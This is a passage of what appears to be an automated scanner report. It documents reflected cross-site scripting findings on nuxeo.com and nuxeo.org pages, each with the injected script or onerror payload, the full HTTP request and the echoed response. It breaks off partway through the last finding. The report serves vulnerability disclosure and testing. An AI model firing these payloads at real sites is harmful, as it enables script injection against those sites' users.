1.8. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/downloads/download-dm-form

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 15bd8--><script>alert(1)</script>86fa8735a8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/downloads15bd8--><script>alert(1)</script>86fa8735a8f/download-dm-form HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:41 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 15 Nov 2010 12:18:41 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:18:41 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/downloads15bd8--><script>alert(1)</script>86fa8735a8f/download-dm-form/-->
...[SNIP]...

1.9. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/downloads/download-dm-form

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload df27c--><script>alert(1)</script>40a84b08494 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/downloads/download-dm-formdf27c--><script>alert(1)</script>40a84b08494 HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:08 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 15 Nov 2010 12:19:08 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:19:08 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/downloads/download-dm-formdf27c--><script>alert(1)</script>40a84b08494/-->
...[SNIP]...

1.10. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/products/document-management/getting-started

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 6945d--><script>alert(1)</script>9547c34988d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en6945d--><script>alert(1)</script>9547c34988d/products/document-management/getting-started HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:51 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:17:51 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en6945d--><script>alert(1)</script>9547c34988d/products/document-management/getting-started/-->
...[SNIP]...

1.11. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/products/document-management/getting-started

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 8692f--><script>alert(1)</script>841c8c775c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/products8692f--><script>alert(1)</script>841c8c775c8/document-management/getting-started HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:43 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:18:43 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/products8692f--><script>alert(1)</script>841c8c775c8/document-management/getting-started/-->
...[SNIP]...

1.12. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/products/document-management/getting-started

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 4d655--><script>alert(1)</script>e6f61f7d157 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/products/document-management4d655--><script>alert(1)</script>e6f61f7d157/getting-started HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:20 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:19:20 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/products/document-management4d655--><script>alert(1)</script>e6f61f7d157/getting-started/-->
...[SNIP]...

1.13. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/products/document-management/getting-started

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 74450--><script>alert(1)</script>6984a629a28 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/products/document-management/getting-started74450--><script>alert(1)</script>6984a629a28 HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:48 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:19:49 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/products/document-management/getting-started74450--><script>alert(1)</script>6984a629a28/-->
...[SNIP]...

1.14. http://www.nuxeo.com/en/services/training [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/services/training

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 71135--><script>alert(1)</script>410caedb9c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en71135--><script>alert(1)</script>410caedb9c4/services/training HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:01 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:18:02 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en71135--><script>alert(1)</script>410caedb9c4/services/training/-->
...[SNIP]...

1.15. http://www.nuxeo.com/en/services/training [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/services/training

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 7dac6--><script>alert(1)</script>417df72f5c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/services7dac6--><script>alert(1)</script>417df72f5c7/training HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:54 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:18:54 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/services7dac6--><script>alert(1)</script>417df72f5c7/training/-->
...[SNIP]...

1.16. http://www.nuxeo.com/en/services/training [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/services/training

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 38728--><script>alert(1)</script>3534a3f71fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/services/training38728--><script>alert(1)</script>3534a3f71fa HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:39 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:19:39 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/services/training38728--><script>alert(1)</script>3534a3f71fa/-->
...[SNIP]...

1.17. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7e1f1--><script>alert(1)</script>7e40053b44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /extension7e1f1--><script>alert(1)</script>7e40053b44/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js HTTP/1.1
Accept: */*
Referer: http://www.nuxeo.org/xwiki/bin/view/Main/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:08:59 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Set-Cookie: eZSESSID=8303555f256cc3d6f8049a70f1d2db56; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:08:59 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 33774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/extension7e1f1--><script>alert(1)</script>7e40053b44/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js/-->
...[SNIP]...

1.18. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 10d63--><script>alert(1)</script>ad21aa13a8b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /extension/nuxeo_design/design10d63--><script>alert(1)</script>ad21aa13a8b/nuxeo/javascript/mtcJSAPI.js HTTP/1.1
Accept: */*
Referer: http://www.nuxeo.org/xwiki/bin/view/Main/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:09:27 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Set-Cookie: eZSESSID=0fb05ad10c166829ebc54c5d76671e37; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:09:27 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 33739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/extension/nuxeo_design/design10d63--><script>alert(1)</script>ad21aa13a8b/nuxeo/javascript/mtcJSAPI.js/-->
...[SNIP]...

1.19. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 3bff6--><script>alert(1)</script>be29ccef587 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /extension/nuxeo_design/design/nuxeo/javascript3bff6--><script>alert(1)</script>be29ccef587/mtcJSAPI.js HTTP/1.1
Accept: */*
Referer: http://www.nuxeo.org/xwiki/bin/view/Main/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:09:54 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Set-Cookie: eZSESSID=213640b5ccd9e02f69c3dca67dfd6a01; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:09:54 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 33739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/extension/nuxeo_design/design/nuxeo/javascript3bff6--><script>alert(1)</script>be29ccef587/mtcJSAPI.js/-->
...[SNIP]...

1.20. http://www.nuxeo.org/discussions/index.jspa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /discussions/index.jspa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ade"><script>alert(1)</script>c594b43b6bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /discussions/index.jspa?d3ade"><script>alert(1)</script>c594b43b6bf=1 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:17:55 GMT
Server: Server: Jetty(6.0.x)
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=10e4g71e3s4cu;Path=/discussions
Content-Language: en
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Set-Cookie: jive.server.info=serverName=www.nuxeo.org:serverPort=80:contextPath=/discussions:localName=212.85.154.51:localPort=9809:localAddr=212.85.154.51;Path=/discussions
Vary: Accept-Encoding
Connection: close
Content-Length: 46232


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Support Forums : Forum Home</title>
<meta http-equiv="content-type" content="text/html; charset=ISO-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/discussions/style/style.jsp?d3ade"><script>alert(1)</script>c594b43b6bf=1" />
...[SNIP]...

1.21. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/export/Main/WebHome

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f83de"><img%20src%3da%20onerror%3dalert(1)>5f41d66ee78 was submitted in the REST URL parameter 4. This input was echoed as f83de"><img src=a onerror=alert(1)>5f41d66ee78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/export/Mainf83de"><img%20src%3da%20onerror%3dalert(1)>5f41d66ee78/WebHome HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:18:25 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12858
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
